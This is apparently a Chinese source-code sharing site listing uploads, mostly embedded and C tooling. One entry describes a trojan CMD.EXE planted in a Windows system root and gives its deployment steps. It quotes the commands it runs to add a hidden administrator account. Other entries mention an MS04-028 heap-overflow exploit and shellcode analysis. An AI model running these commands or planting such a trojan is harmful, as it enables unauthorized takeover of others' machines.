SPI(Serial Peripheral Interface,串行外圍接口)是Motorola公司提出的外圍接口協議,它采用一個串行、同步、全雙工的通信方式,解決了微處理器和外設之間的串行通信問題,并且可以和多個外設直接通信,具有配置靈活,結構簡單等優點。根據全功能SPI總線的特點,設計的SPI接口可以最大發送和接收16位數據;在主模式和從模式下SPI模塊的時鐘頻率最大可以達到系統時鐘的1/4,并且在主模式下可以提供具有四種不同相位和極性的時鐘供從模塊選擇;可以同時進行發送和接收操作,擁有中斷標志位和溢出中斷標志位。
上傳時間: 2013-11-11
上傳用戶:himbly
已通過CE認證。(為什么要選擇經過CE認證的編程器?) 程速度無與倫比,逼近芯片理論極限。 基本配置48腳流行驅動電路。所選購的適配器都是通用的(插在DIP48鎖緊座上),即支持同封裝所有類型器件,48腳及以下DIP器件無需適配器直接支持。通用適配器保證快速新器件支持。I/O電平由DAC控制,直接支持低達1.5V的低壓器件。 更先進的波形驅動電路極大抑制工作噪聲,配合IC廠家認證的算法,無論是低電壓器件、二手器件還是低品質器件均能保證極高的編程良品率。編程結果可選擇高低雙電壓校驗,保證結果持久穩固。 支持FLASH、EPROM、EEPROM、MCU、PLD等器件。支持新器件僅需升級軟件(免費)。可測試SRAM、標準TTL/COMS電路,并能自動判斷型號。 自動檢測芯片錯插和管腳接觸不良,避免損壞器件。 完善的過流保護功能,避免損壞編程器。 邏輯測試功能。可測試和自動識別標準TTL/CMOS邏輯電路和用戶自定義測試向量的非標準邏輯電路。 豐富的軟件功能簡化操作,提高效率,避免出錯,對用戶關懷備至。工程(Project)將用戶關于對象器件的各種操作、設置,包括器件型號設定、燒寫文件的調入、配置位的設定、批處理命令等保存在工程文件中,每次運行時一步進入寫片操作。器件型號選擇和文件載入均有歷史(History)記錄,方便再次選擇。批處理(Auto)命令允許用戶將擦除、查空、編程、校驗、加密等常用命令序列隨心所欲地組織成一步完成的單一命令。量產模式下一旦芯片正確插入CPU即自動啟動批處理命令,無須人工按鍵。自動序列號功能按用戶要求自動生成并寫入序列號。借助于開放的API用戶可以在線動態修改數據BUFFER,使每片芯片內容均不同。器件型號選錯,軟件按照實際讀出的ID提示相近的候選型號。自動識別文件格式, 自動提示文件地址溢出。 軟件支持WINDOWS98/ME/NT/2000/XP操作系統(中英文)。 器件型號 編程(秒) 校驗(秒) P+V (s) Type 28F320W18 9 4.5 13.5 32Mb FLASH 28F640W30 18 9 27 64Mb FLASH AM29DL640E 38.3 10.6 48.9 64Mb FLASH MB84VD21182DA 9.6 2.9 12.5 16Mb FLASH MB84VD23280FA 38.3 10.6 48.9 64Mb FLASH LRS1381 13.3 4.6 19.9 32Mb FLASH M36W432TG 11.8 4.6 16.4 32Mb FLASH MBM29DL323TE 17.5 5.5 23.3 32Mb FLASH AT89C55WD 2.1 1 3.1 20KB MCU P89C51RD2B 4.6 0.9 5.5 64KB MCU
上傳時間: 2013-11-21
上傳用戶:xiaoyuer
檢查C/C++源程序中的可能錯誤和容易遭受弱點攻擊的地方,如內存溢出攻擊等。
上傳時間: 2014-11-28
上傳用戶:yph853211
C程序漏洞檢查,可以檢查變量未初始化、空指針使用、數組溢出等錯誤
上傳時間: 2015-01-06
上傳用戶:thesk123
CExceptionLogger,是一個可以免費使用的C++類,用它可以截獲未處理異常,如:非法存取、棧溢出、被零除等,并可以將異常詳細信息記錄到日志文件
標簽: CExceptionLogger
上傳時間: 2013-11-28
上傳用戶:cxl274287265
ShellCode分析,溢出攻擊
上傳時間: 2015-01-08
上傳用戶:R50974
這個程序是一個Win32程序,計算Fibonacci斐波納契數列(一種整數數列, 其中每數等于前面兩數之和)。其定義是f(1) = 1,f(2) = 2,并且當n>2時, f(n) = f(n-1) + f(n-2)。源代碼種給出了三種計算方法。第一種方法用遞歸,第二種方法用大數組,第三種方法用小數組。此外,這個程序還具備多線程特性,所以在運算時可以做其它操作。代碼用到了以前創建的Win32類。測試為發現bug和內存溢出。
上傳時間: 2015-01-11
上傳用戶:GHF
你是不是經常在開始菜單的運行窗口里運行命令呢? 看看這個漏洞: http://zdnet.com /2100-1105-964057.html win2000和xp在執行搜索的時候, 首先查找根目錄 而開始菜單的運行窗口里執行命令, 也是首先在系統盤的根目錄里進行查找. 這個漏洞其實是已經是公開的秘密了. 既然現在作為漏洞公布出來, 我也就把網上的PasswordReminder.cpp拿來改了改 加了一個加超級管理員用戶和執行cmd.exe的功能. 使用方法: 把程序解壓, 把壓縮包里的文件 CMD.EXE (該文件具有隱藏和只讀屬性) 釋放到目標機器的系統盤根目錄, 一般都是在C:比如利用UNICODE/Decode漏洞就有寫根目錄的權限, 同時Asp/fp30reg.dll等遠程溢出出來的Shell, 一般都只有匿名權限, 但是它具有寫根目錄的權限 這個時候, 就可以把本程序放到目標機器的系統盤根目錄 只要等管理員在機器的開始菜單里運行命令: cmd 一切盡在掌握中.:) PS: 系統執行后, 會先產生一個線程來做一些處理 然后用system()函數調用cmd.exe來讓用戶能夠執行命令. 產生出來的線程會產生兩個進程序執行如下兩個命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 這樣就在系統上增加了一個超級
上傳時間: 2015-01-12
上傳用戶:qlpqlq
P1.7~P1.0接發光二極管L8~L1,要求利用單片機內部定時器1,按方式1工作,每0.01秒T1溢出中斷一次。要求編寫程序模擬時序控制裝置。開機第1秒鐘L1、L3亮,第2秒鐘L2、L4亮,第3秒鐘L5、L7亮,第4秒鐘L6、L8亮,第5秒鐘L1、L3、L5、L7亮,第6秒鐘L2、L4、L6、L8亮,第7秒鐘8個發光二極管全亮,……一直循環下去。fosc=11.0592MHz
上傳時間: 2015-03-08
上傳用戶:kikye
ms04028漏洞利用程序,利用GDIPLUS.DLL的堆溢出漏洞
上傳時間: 2015-03-14
上傳用戶:qunquan